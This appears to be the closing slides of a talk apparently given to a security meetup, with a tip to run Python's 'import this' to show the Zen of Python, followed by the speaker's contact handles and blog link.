IMPORT THIS .
• From an IDE (IDLE) or a Python shell,
run import this and the Zen of
Python will be revealed.
Etc.
Final thoughts
Questions?
Keith Dixon
@Tazdrumm3r
#misec – Tazdrumm3r
[email protected]
http://tazdrumm3r.wordpress.com